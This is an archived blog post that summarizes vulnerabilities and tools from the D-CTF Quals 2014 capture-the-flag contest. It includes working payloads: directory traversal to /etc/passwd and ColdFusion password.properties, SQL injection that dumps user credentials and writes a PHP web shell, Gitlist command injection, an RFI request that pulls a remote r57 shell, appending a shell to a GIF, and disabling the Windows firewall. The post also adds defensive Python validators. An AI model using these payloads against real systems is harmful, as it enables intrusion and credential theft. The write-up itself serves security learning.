<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Exploring D-CTF Quals 2014's Exploits</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="Marina von Steinkirch">
<!-- Le styles -->
<link rel="stylesheet" href="./theme/css/bootstrap.dark.css" type="text/css" />
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.tag-1 {
font-size: 13pt;
}
.tag-2 {
font-size: 11pt;
}
.tag-3 {
font-size: 10pt;
}
.tag-4 {
font-size: 8pt;
}
</style>
<link href="./theme/css/bootstrap-responsive.dark.css" rel="stylesheet">
<link href="./theme/css/font-awesome.css" rel="stylesheet">
<link href="./theme/css/pygments.css" rel="stylesheet">
<!-- Le fav and touch icons -->
<link rel="shortcut icon" href="./theme/images/favicon.ico">
<link rel="apple-touch-icon" href="./theme/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="72x72" href="./theme/images/apple-touch-icon-72x72.png">
<link rel="apple-touch-icon" sizes="114x114" href="./theme/images/apple-touch-icon-114x114.png">
<link href="./feeds/all.atom.xml" type="application/atom+xml" rel="alternate" title="chmod +x singularity.sh ATOM Feed" />
</head>
<body>
<div class="container-fluid">
<div class="row">
<div class="span9" id="content">
<section id="content">
<article>
<header>
<h1>
<a href=""
rel="bookmark"
title="Permalink to Exploring D-CTF Quals 2014's Exploits">
Exploring D-CTF Quals 2014's Exploits
</a>
</h1>
</header>
<div class="entry-content">
<div class="well">
<footer class="post-info">
<abbr class="published" title="2014-10-22T06:30:00">
Wed 22 October 2014 </abbr>
<span class="label"> Category</span>
<a href="./category/web-security.html"><i class="icon-folder-open"></i>Web Security</a>
<span class="label">Tags</span>
<a href="./tag/linux.html"><i class="icon-tag"></i>Linux</a>
<a href="./tag/rfi.html"><i class="icon-tag"></i>RFI</a>
<a href="./tag/sql_injection.html"><i class="icon-tag"></i>SQL_injection</a>
<a href="./tag/lfi.html"><i class="icon-tag"></i>LFI</a>
<a href="./tag/rce.html"><i class="icon-tag"></i>RCE</a>
<a href="./tag/php.html"><i class="icon-tag"></i>PHP</a>
<a href="./tag/cms.html"><i class="icon-tag"></i>CMS</a>
<a href="./tag/apphp.html"><i class="icon-tag"></i>ApPHP</a>
<a href="./tag/unoconv.html"><i class="icon-tag"></i>unoconv</a>
<a href="./tag/coldfusion.html"><i class="icon-tag"></i>ColdFusion</a>
<a href="./tag/buffer_overflow.html"><i class="icon-tag"></i>Buffer_Overflow</a>
<a href="./tag/steganography.html"><i class="icon-tag"></i>Steganography</a>
<a href="./tag/wireshark.html"><i class="icon-tag"></i>Wireshark</a>
<a href="./tag/exiftool.html"><i class="icon-tag"></i>ExifTool</a>
<a href="./tag/netsh.html"><i class="icon-tag"></i>netsh</a>
<a href="./tag/ctf.html"><i class="icon-tag"></i>CTF</a>
<a href="./tag/scapy.html"><i class="icon-tag"></i>scapy</a>
<a href="./tag/rips.html"><i class="icon-tag"></i>RIPS</a>
<a href="./tag/heartbleed.html"><i class="icon-tag"></i>Heartbleed</a>
<a href="./tag/nmap.html"><i class="icon-tag"></i>nmap</a>
</footer><!-- /.post-info --> </div>
<p>Last weekend I played some of the <a href="http://dctf.defcamp.ro/challs">DEFCAMP CTF Quals</a>. It was pretty intense. For (my own) organizational purposes, I made a list of all the technologies and vulnerabilities found in this CTF, some based on my team's game, some based on the <a href="https://github.com/ctfs/write-ups/tree/master/d-ctf-2014/">CTF write-ups git repo</a>.</p>
<h2>Vulnerabilities</h2>
<h3>Remote File Inclusion and Local File Inclusion Vulnerabilities</h3>
<p>In <a href="http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion">Remote File Inclusion</a> (RFI) an attacker makes the application include a file hosted on a server the attacker controls, so the exploit runs in the context of the target application; RFI can be used to run exploits on both the server and the client side. PHP's <a href="http://php.net/manual/en/function.include.php">include()</a> called with a user-controlled path is the classic RFI sink.</p>
<p><a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion">Local File Inclusion</a> (LFI) is similar to RFI, but only files already present on the server can be included. This type of vulnerability is often seen in file-upload forms with improper sanitization.</p>
<p>An example of this kind of exploitation is a form that only accepts certain extensions (such as JPG or PNG) but performs the check on the client side. An attacker can then tamper with the HTTP request to send shell code (with a PHP extension, for example). I've shown examples of this attack in the <a href="http://bt3gl.github.io/exploiting-the-web-in-20-lessons-natas.html">Natas post</a>, where the trick was to rename a PHP shell to one of these "safe" extensions.</p>
<h3>TimThumb and LFI</h3>
<p><a href="https://code.google.com/p/timthumb/">TimThumb</a> is a PHP script for manipulating web images. It was recently <a href="http://www.binarymoon.co.uk/2014/09/timthumb-end-life/">discontinued because of security issues</a>.</p>
<p>With TimThumb 1.33, an attacker can upload a shell by appending it to an image; all she needs is to host it on some online subdomain. TimThumb stores this image in a cache folder and generates an MD5 of the shell's full path. The last step is an LFI attack against the shell in that folder. Check this <a href="http://kaoticcreations.blogspot.com/2011/12/lfi-tip-how-to-read-source-code-using.html">example of LFI exploitation</a>.</p>
<h3>CMS Mini and RFI</h3>
<p><a href="http://www.mini-print.com/">CMS Mini</a> is a flat-file system for building simple websites. It has <a href="http://www.exploit-db.com/exploits/33030/">several vulnerabilities</a> such as <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)">CSRF</a>, RFI, and <a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)">XSS</a>.</p>
<p>An example of the RFI vulnerability in CMS Mini can be triggered with curl:</p>
<div class="highlight"><pre><span class="err">http://[target/IP]/cmsmini/admin/edit.php?path=&amp;name=../../../../../etc/passwd</span>
</pre></div>
<p>For more examples of exploits, check <a href="http://en.1337day.com/exploit/22391">1337day</a> and <a href="http://www.exploit-db.com/exploits/28128/">this exploit-db</a>.</p>
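<p>The inclusion bugs above (PHP <code>include()</code> fed a remote URL, the CMS Mini <code>../../../../../etc/passwd</code> traversal, and the <code>%00</code> null-byte truncation used against ColdFusion later in this post) are all the same missing check on the server side. The following is an added example of that check, my own code rather than anything from the post or from the affected projects: it resolves a user-supplied include name against a web root and refuses anything that leaves it. The web root, the allowed extensions and the sample requests are constructed for the demo, and <code>attacker.example</code> is a hypothetical host.</p>

```python
import os
import tempfile
from urllib.parse import unquote

# Allow-list of extensions an include parameter may name (constructed policy)
ALLOWED_EXTENSIONS = {".php", ".html", ".txt"}


def resolve_include(base_dir, requested):
    """Return the absolute path of `requested` inside `base_dir`, or None.

    Rejects the input classes behind RFI/LFI:
      - any URL scheme (http://, ftp://, ...), i.e. remote inclusion
      - null bytes, which truncate the path in older PHP/ColdFusion (%00 trick)
      - traversal with either slash style (../ or ..\\) that escapes base_dir
      - names whose extension is not on the allow-list
    """
    # Decode percent-encoding first so %00 and %2e%2e are judged as what they become
    decoded = unquote(requested)
    if "\x00" in decoded:
        return None
    # A colon before the first slash means a scheme (http:) or a drive letter (C:)
    if ":" in decoded.split("/", 1)[0]:
        return None
    # Fold backslashes so Windows-style traversal is seen by realpath as well
    candidate = decoded.replace("\\", "/")
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, candidate))
    # The resolved path must still be underneath the web root
    if os.path.commonpath([base, full]) != base:
        return None
    if os.path.splitext(full)[1].lower() not in ALLOWED_EXTENSIONS:
        return None
    return full if os.path.isfile(full) else None


def demo():
    """Create a throwaway web root with one page and classify constructed requests."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "about.html"), "w") as fh:
        fh.write("<h1>about</h1>")
    requests = [
        "about.html",                                               # legitimate
        "../../../../../etc/passwd",                                # LFI traversal (CMS Mini style)
        "..\\..\\..\\..\\CFusionMX\\lib\\password.properties%00en",  # null-byte truncation
        "http://attacker.example/shell.txt",                        # RFI, hypothetical host
    ]
    # True means the include would be allowed
    return {r: resolve_include(root, r) is not None for r in requests}


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(("allow " if allowed else "reject") + "  " + name)
```

<p>Note that decoding comes first: a check run on the raw parameter would see <code>%00</code> as three harmless characters, while the runtime that later opens the file sees a string terminator. Resolving with <code>realpath</code> and comparing against the root also covers symlinks, which a plain string search for <code>..</code> does not.</p>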
<h3>ApPHP and Remote Code Execution</h3>
<p><a href="http://www.apphp.com/">ApPHP</a> is a blog script known for having <a href="http://www.exploit-db.com/exploits/33030/">several vulnerabilities</a>, including <a href="https://www.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Execution">remote code execution</a> (RCE). An example of an RCE exploit for ApPHP <a href="http://www.exploit-db.com/exploits/33070/">can be seen here</a>. A good start is to check PHP's <a href="http://php.net/manual/en/ini.core.php#ini.disable-functions">disable_functions</a> list: whatever the server operator did not list there is still callable.</p>
<p>In this CTF, the challenge was to find what was <em>not</em> in that list. For instance, it was possible to use <a href="http://php.net/manual/en/reserved.variables.post.php">$_POST</a> and <a href="http://php.net/manual/en/reserved.variables.cookies.php">$_COOKIE</a> to send strings to functions such as <a href="http://php.net/manual/en/function.scandir.php">scandir()</a> and <a href="http://php.net/manual/en/function.file-get-contents.php">file_get_contents()</a>:</p>
<div class="highlight"><pre><span class="err">GET Request: ?asdf);print_r(scandir(implode($_COOKIE))=/</span>
<span class="err">Cookie: 0=include</span>
</pre></div>
<p>In addition, with a writable directory we can drop a shell on the server (you can use script-kiddie scripts like <a href="http://www.r57shell.net/">r57shell.net</a>, but in real life keep in mind that they are very often <a href="http://thehackerblog.com/hacking-script-kiddies-r57-gen-tr-shells-are-backdoored-in-a-way-you-probably-wouldnt-guess/#more-447">backdoored</a>).</p>
<div class="highlight"><pre><span class="err">Post Request: 0=include/myfile.php</span>
<span class="err">Cookie: 0=http://www.r57shell.net/shell/r57.txt</span>
</pre></div>
<h3>Gitlist and Remote Command Execution</h3>
<p><a href="http://gitlist.org/">Gitlist</a> is an application for browsing git repositories in a browser. Versions up to 5.0 are known for <a href="http://www.websecuritywatch.com/arbitrary-command-execution-in-gitlist/">allowing remote attackers to execute arbitrary commands via the shell</a>, a type of <a href="http://cwe.mitre.org/data/definitions/77.html">command injection</a>. Exploits for this vulnerability can be seen at <a href="http://hatriot.github.io/blog/2014/06/29/gitlist-rce/">hatriot</a>, at <a href="http://packetstormsecurity.com/files/127364/Gitlist-Unauthenticated-Remote-Command-Execution.html">packet storm</a>, at <a href="http://en.1337day.com/exploit/22391">1337day</a>, and at <a href="http://www.exploit-db.com/exploits/33990/">exploit-db</a>.</p>
<p>In this CTF, the following command could be used to look for the flag:</p>
<div class="highlight"><pre><span class="err">http://10.13.37.33/gitlist/redis/blame/unstable/README%22%22%60ls%20-al%60</span>
</pre></div>
<h3>LibreOffice's Socket Connections</h3>
<p>LibreOffice has a binary, <a href="http://www.processlibrary.com/en/directory/files/soffice/66728/">soffice.bin</a>, that accepts socket connections on <em>port 2002</em> (in this CTF, on the VPN's localhost).</p>
<p>For instance, the <a href="http://linux.die.net/man/1/unoconv">unoconv</a> command can be used to convert a file to any LibreOffice-supported format. Its <strong>-c</strong> (connection) flag sets the connection string the client uses to reach a LibreOffice instance; the same string is used in listener mode to make LibreOffice listen.</p>
<p>From the documentation, the default connection string is:</p>
<div class="highlight"><pre><span class="err">Default connection string is "socket,host=localhost,port=2002;urp;StarOffice.ComponentContext"</span>
</pre></div>
<p>Therefore, you can connect to the socket and convert some document (such as <em>/flag.txt</em>) to a PDF for example:</p>
<div class="highlight"><pre><span class="nv">$ </span>unoconv --connection <span class="s1">'socket,host=127.0.0.1,port=2002;urp;StarOffice.ComponentContext'</span> -f pdf /flag.txt
</pre></div>
<p>An example of payload can be seen <a href="https://github.com/ctfs/write-ups/tree/master/d-ctf-2014/web-400">here</a>.</p>
<h3>ColdFusion and Local File Disclosure</h3>
<p><a href="http://en.wikipedia.org/wiki/Adobe_ColdFusion">ColdFusion</a> is an old web application development platform. It carries its own interpreted language, <strong>CFM</strong>, on a Java backend.</p>
<p>CFM has scripting features like ASP and PHP, with syntax resembling HTML and JavaScript. ColdFusion scripts use the <strong>cfm</strong> and <strong>cfc</strong> file extensions. For instance, <a href="http://www.adobe.com/products/coldfusion-family.html">Adobe ColdFusion 11</a> and <a href="http://www.getrailo.org/">Railo 4.2</a>, the two platforms that run CFM, were both released at the beginning of 2014.</p>
<p>The problem is that CFM is <a href="http://www.intelligentexploit.com/view-details.html?id=12750">vulnerable to a variety of attacks</a>, including <a href="https://www.owasp.org/index.php/Full_Path_Disclosure">Local File Disclosure</a> (LFD) and SQL injection (SQLi). Add the fact that ColdFusion scripts usually run under highly privileged accounts, and we have a very vulnerable platform.</p>
<h4>SQL Injection (SQLi)</h4>
<p><a href="https://www.owasp.org/index.php/SQL_Injection">SQL Injection</a> is a classic attack where one injects SQL fragments into a <a href="http://technet.microsoft.com/en-us/library/bb264565(v=sql.90).aspx">SQL query</a> built from untrusted input. Vulnerabilities of this type can be spotted in queries such as <strong>index.php?id=1</strong>. I showed some of these exploits in my <a href="http://bt3gl.github.io/exploiting-the-web-in-20-lessons-natas.html">Natas post</a>.</p>
<p>In this CTF, these were some of the exploits that could be used:</p>
<ul>
<li>List everything in a database, where <strong>0x3a</strong> is the hexadecimal symbol for <strong>:</strong>:</li>
</ul>
<div class="highlight"><pre><span class="k">UNION</span> <span class="k">ALL</span> <span class="k">SELECT</span> <span class="mi">1</span><span class="p">,</span><span class="n">concat</span><span class="p">(</span><span class="n">username</span><span class="p">,</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="n">password</span><span class="p">,</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="n">email</span><span class="p">),</span><span class="mi">3</span> <span class="k">FROM</span> <span class="n">cms</span><span class="p">.</span><span class="n">users</span><span class="c1">--</span>
</pre></div>
<ul>
<li>See the password file content:</li>
</ul>
<div class="highlight"><pre><span class="k">UNION</span> <span class="k">ALL</span> <span class="k">SELECT</span> <span class="mi">1</span><span class="p">,</span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="ss">"/etc/passwd"</span><span class="p">),</span><span class="mi">3</span><span class="c1">--</span>
</pre></div>
<ul>
<li>Write a file and create a PHP shell at <strong>URL/shell.php</strong>, which takes a parameter <strong>x</strong> holding the command to execute (based on <a href="https://github.com/ctfs/write-ups/tree/master/d-ctf-2014/web-400">this</a>):</li>
</ul>
<div class="highlight"><pre><span class="nt">UNION</span> <span class="nt">ALL</span> <span class="nt">SELECT</span> <span class="nt">1</span> <span class="s2">"<?php header("</span><span class="nt">Content-Type</span><span class="o">:</span> <span class="nt">text</span><span class="o">/</span><span class="nt">plain</span><span class="o">;</span><span class="nt">charset</span><span class="o">=</span><span class="nt">utf-8</span><span class="s2">"); echo system($-GET</span><span class="cp">[</span><span class="s2">"x"</span><span class="cp">]</span><span class="s2">); ?>',3 INTO OUTFILE '/var/www/html/shell.php"</span><span class="nt">--</span>
</pre></div>
<p>Notice the <em>trailing pair of hyphens</em> <strong>--</strong>, which tells most database servers that the remainder of the statement is a comment and is not executed (it neutralizes the trailing single quote left over from the original query). To learn more about how to mitigate SQLi, I recommend <a href="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet">OWASP's SQLi Prevention Cheat Sheet</a> and <a href="http://owtf.github.io/boilerplate-templates/SQLinjection.html">this nice guide for SQLi mitigation</a> by OWASP OWTF.</p>
<p>By the way, it's useful in general to know <a href="http://www.w3schools.com/tags/ref_urlencode.asp">HTML URL Encoding</a> to craft these URLs.</p>
<h3>CesarFTP 0.99g and Buffer Overflow</h3>
<p><a href="http://www.softpedia.com/get/Internet/Servers/FTP-Servers/Cesar-FTP.shtml">CesarFTP 0.99g</a> is an easy-to-use FTP server. It is also known for having several vulnerabilities, including a <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2961">buffer overflow</a>.</p>
<p>For example, see this exploit for <strong>Metasploit</strong> from <a href="http://www.exploit-db.com/exploits/16713/">exploit-db</a> (or <a href="http://www.exploit-db.com/exploits/1906/">an older one here</a>).</p>
<h3>ColdFusion and File Disclosure of Password Hashes</h3>
<p>This vulnerability provides a 30-second window in the Administration panel, which can be used to write a shell. The main idea is a <a href="https://www.owasp.org/index.php/Path_Traversal">directory traversal</a> to <strong>password.properties</strong>, whose contents can be used to log in to the server.</p>
<p>Ingredients of this attack are:</p>
<ul>
<li>
<p>The target must have the ColdFusion administrator available, which by default is mapped to <strong><em>CFIDE/administrator/enter.cfm</em></strong>. If it returns a <a href="http://en.wikipedia.org/wiki/List_of_HTTP_status_codes">500</a>, switch to HTTPS.</p>
</li>
<li>
<p>At the ColdFusion administrator, verify the version, and then use these injections:</p>
</li>
</ul>
<div class="highlight"><pre><span class="p">(</span><span class="n">Version</span> <span class="mi">6</span><span class="p">)</span><span class="o">:</span> <span class="n">http</span><span class="o">:</span><span class="c1">//site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en</span>
<span class="p">(</span><span class="n">Version</span> <span class="mi">7</span><span class="p">)</span><span class="o">:</span> <span class="n">http</span><span class="o">:</span><span class="c1">//site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en</span>
<span class="p">(</span><span class="n">Version</span> <span class="mi">8</span><span class="p">)</span><span class="o">:</span> <span class="n">http</span><span class="o">:</span><span class="c1">//site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en</span>
<span class="p">(</span><span class="n">All</span> <span class="n">versions</span><span class="p">)</span><span class="o">:</span> <span class="n">http</span><span class="o">:</span><span class="c1">//site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en</span>
</pre></div>
<ul>
<li>Now a shell can be written to a file and added in <strong>Schedule New Task</strong>. See detailed instructions at <a href="http://www.blackhatlibrary.net/Coldfusion_hacking">blackhatlib</a>, at <a href="http://www.infointox.net/?p=59">infointox</a>, at <a href="http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/">gnucitizen</a>, at <a href="http://kaoticcreations.blogspot.com/2012/11/hacking-cold-fusion-servers-part-i.html">kaoticcreations</a>, at <a href="https://www.cyberguerrilla.org/blog/?p=18275">cyberguerilla</a>, at <a href="http://jumpespjump.blogspot.com/2014/03/attacking-adobe-coldfusion.html">jumpespjump</a>, and at <a href="http://hexale.blogspot.com/2008/07/how-to-decrypt-coldfusion-datasource.html">hexale</a>.</li>
</ul>
<hr />
<h2>Useful Tools</h2>
<h3>Vulnerability Scanners</h3>
<p>Vulnerability scanners can be useful for several problems. For instance, for a PHP static source code analyser, we can use <a href="http://rips-scanner.sourceforge.net/">RIPS</a>.</p>
<p>In this CTF we had to scan for <a href="http://en.wikipedia.org/wiki/Heartbleed">Heartbleed</a>, and we used <a href="https://gist.githubusercontent.com/eelsivart/10174134/raw/5c4306a11fadeba9d9f9385cdda689754ca4d362/heartbleed.py">this script</a>.</p>
<h3>Scapy</h3>
<p><a href="http://packetlife.net/blog/2011/may/23/introduction-scapy/">Scapy</a> is a Python lib for crafting packets. It can be useful for problems such as <a href="http://en.wikipedia.org/wiki/Port_knocking">port knocking</a>. For illustration, check this <a href="http://eindbazen.net/2011/12/phd-ctf-quals-2011-%E2%80%93-port-knocking/">example from PHD CTF 2011</a> and this from <a href="http://blog.dul.ac/2014/05/ASISCTF14/">ASIS CTF 2014</a>. Check <a href="https://code.google.com/p/pypk/source/browse/branches/release-0.1.0/knocker.py?r=3">this project</a> too.</p>
<h3>Steganography</h3>
<p>One of the questions had a reference to the <a href="https://ccrma.stanford.edu/~eberdahl/Projects/Paranoia/">paranoia.jar</a> tool, which hides text in an image file using <a href="http://en.wikipedia.org/wiki/Advanced_Encryption_Standard">128-bit AES</a> encryption.</p>
<p>To run the tool (after downloading it) just do:</p>
<div class="highlight"><pre>java -jar paranoia.jar
</pre></div>
<h3>HTTP/HTTPS Request Tampering</h3>
<p>Very useful for the RFI problems (but not limited to them):</p>
<ul>
<li><a href="https://addons.mozilla.org/en-US/firefox/addon/tamper-data/">Tamper Data</a>: view and modify HTTP/HTTPS headers.</li>
<li><a href="http://portswigger.net/burp/">Burp</a>: a Java application to secure or penetrate web applications.</li>
</ul>
<h3>Wireshark</h3>
<p>At some point I'm going to dedicate an entire post for <a href="https://www.wireshark.org/">Wireshark</a>, but for this CTF the important things to know were:</p>
<ul>
<li>Look for POST requests:</li>
</ul>
<div class="highlight"><pre><span class="n">http</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="s">"POST"</span>
</pre></div>
<ul>
<li>Submit the found data (same username, nonce, and password) with the command:</li>
</ul>
<div class="highlight"><pre><span class="err">$</span> <span class="n">curl</span> <span class="o">--</span><span class="n">data</span> <span class="err">'</span><span class="n">user</span><span class="o">=</span><span class="n">manager</span><span class="o">&</span><span class="n">nonce</span><span class="o">=</span><span class="mi">7413734</span><span class="n">ab666ce02cf27c9862c96a8e7</span><span class="o">&</span><span class="n">pass</span><span class="o">=</span><span class="mi">3</span><span class="n">ecd6317a873b18e7dde351ac094ee3b</span><span class="err">'</span> <span class="n">HOST</span>
</pre></div>
<h3><a href="http://en.wikipedia.org/wiki/Exchangeable_image_file_format">Exif</a> Data Extractor</h3>
<p><a href="http://www.sno.phy.queensu.ca/~phil/exiftool/index.html">ExifTool</a> is used for reading, writing, and manipulating image metadata:</p>
<div class="highlight"><pre><span class="nv">$ </span>tar -xf Image-ExifTool-9.74.tar.gz
<span class="nv">$ </span> <span class="nb">cd </span>Image-ExifTool-9.74/
<span class="nv">$ </span>perl Makefile.PL
<span class="nv">$ </span>make <span class="nb">test</span>
<span class="nv">$ </span>sudo make install
<span class="nv">$ </span>exiftool IMAGEFILE
</pre></div>
<h3>MD5 Lookups</h3>
<p>Several hashes in this CTF needed to be searched. Google in general does a good job, but here are some specific websites: <a href="http://hash-killer.com/">hash-killer</a> and <a href="http://www.md5this.com/">md5this</a>.</p>
<h3>In the Shell</h3>
<ul>
<li><strong>Hexadecimal decoders</strong> are essential. You can use <a href="https://docs.python.org/2/library/functions.html#hex">Python</a> (here Python 2's <code>str.decode("hex")</code>):</li>
</ul>
<div class="highlight"><pre><span class="nv">$ </span>python -c <span class="s1">'print "2f722f6e6574736563".decode("hex")'</span>
/r/netsec
</pre></div>
<p>or command line <a href="http://linuxcommand.org/man_pages/xxd1.html">xxd</a>:</p>
<div class="highlight"><pre><span class="nv">$ </span>yum install vim-common
<span class="nv">$ </span>xxd -r -p <span class="o"><<<</span> 2f722f6e6574736563
/r/netsec
</pre></div>
<ul>
<li><strong>Base64 decoders</strong> are also essential:</li>
</ul>
<div class="highlight"><pre><span class="nv">$ </span>base64 --decode <span class="o"><<<</span> BASE64STRING > OUTPUT
</pre></div>
<ul>
<li><strong>nmap</strong>, obviously. You can use it in Python scripts, using the <a href="https://docs.python.org/2/library/subprocess.html">subprocess</a> library:</li>
</ul>
<div class="highlight"><pre>import subprocess
print("[*] Scanning for open ports using nmap")
# argument list, not a shell string, so base_URL (set earlier in the script) cannot inject extra shell commands
subprocess.call(["nmap", "-sS", "-sV", "-T4", "-p", "22-2048", base_URL])
</pre></div>
<ul>
<li><strong>tee</strong> is nice to store and view the output of another command. It can be very useful with <em>curl</em>. A simple example:</li>
</ul>
<div class="highlight"><pre><span class="nv">$ </span>ls | tee file
</pre></div>
<ul>
<li>
<p><strong>chattr</strong> changes file attributes on a Linux file system. For example, <code>chattr +i</code> makes a file immutable, so it cannot be removed (useful when hunting <em>zombie</em> processes).</p>
</li>
<li>
<p><strong>nm</strong> is useful for listing symbols from object files.</p>
</li>
<li>
<p><strong>md5 hashing</strong> is used all the time:</p>
</li>
</ul>
<div class="highlight"><pre><span class="nv">$ </span><span class="nb">echo</span> -n password | md5sum
5f4dcc3b5aa765d61d8327deb882cf99
</pre></div>
<ul>
<li>You might want to <strong>append a shell code to an image</strong> (for example, a GIF file):</li>
</ul>
<div class="highlight"><pre><span class="nv">$ </span>cat PHP-shell.php >> fig.gif
</pre></div>
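<p>The <code>cat PHP-shell.php &gt;&gt; fig.gif</code> trick, and the renamed-extension upload described earlier in the RFI/LFI section, both pass the only check the CTF forms did (the file name). Below is an added example, my own code rather than anything from the post, of what the server should check instead: the extension against an allow-list, the leading bytes against the magic for that extension, and the body for script markup. The sample files are constructed byte strings, not real images, and the accepted-types policy is made up for the demo.</p>

```python
import re

# Magic bytes for the image types a (hypothetical) upload form says it accepts
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Script markup that has no business anywhere inside an image file
SCRIPT_MARKERS = re.compile(rb"<\?(php|=)|<script\b|<%", re.IGNORECASE)


def check_upload(filename, data):
    """Classify an upload as accepted or rejected, with the reason.

    Three independent checks, because each one alone is bypassable:
      1. the extension must be on the allow-list (the only check the CTF forms did,
         and they did it client-side);
      2. the first bytes must match the magic for that extension, which catches a
         PHP file simply renamed to .gif;
      3. the body must not contain script markup, which catches a real GIF with a
         PHP file appended to it.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in MAGIC:
        return "rejected: extension not allowed"
    if not data.startswith(MAGIC[ext]):
        return "rejected: content does not match extension"
    if SCRIPT_MARKERS.search(data):
        return "rejected: script markup embedded in image"
    return "accepted"


# Constructed samples: just enough bytes to exercise each check
CLEAN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff;"
APPENDED_GIF = CLEAN_GIF + b"<?php /* constructed marker, not a shell */ ?>"
RENAMED_PHP = b"<?php /* constructed marker, not a shell */ ?>"


def demo():
    """Run the four upload shapes from the post through the checker."""
    return {
        "fig.gif": check_upload("fig.gif", CLEAN_GIF),                 # honest image
        "fig-appended.gif": check_upload("fig-appended.gif", APPENDED_GIF),  # cat shell >> gif
        "shell.gif": check_upload("shell.gif", RENAMED_PHP),           # PHP renamed to .gif
        "shell.php": check_upload("shell.php", RENAMED_PHP),           # no client-side check
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name.ljust(18), verdict)
```

<p>The marker scan is a heuristic and should be the second line, not the first: the robust fix is to re-encode every accepted image with an image library (which drops anything appended after the image data), to store uploads in a directory the web server does not execute scripts from, and to serve them with a fixed Content-Type.</p>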
<ul>
<li>Now a special one, Windows, which came up in one of the trivia questions in this CTF: how to disable the Windows XP firewall from the command line:</li>
</ul>
<div class="highlight"><pre>netsh firewall <span class="nb">set </span>opmode <span class="nv">mode</span><span class="o">=</span>DISABLE.
</pre></div>
<hr />
<p><strong>That's it. Hack all the things!</strong></p>
</div><!-- /.entry-content -->
</article>
</section>
</div><!--/span-->
</div><!--/row-->
<footer>
<address id="about">
</address><!-- /#about -->
</footer>
</div><!--/.fluid-container-->
<script src="./theme/js/jquery-1.7.2.min.js"></script>
<script src="./theme/js/bootstrap.min.js"></script>
</body>
</html>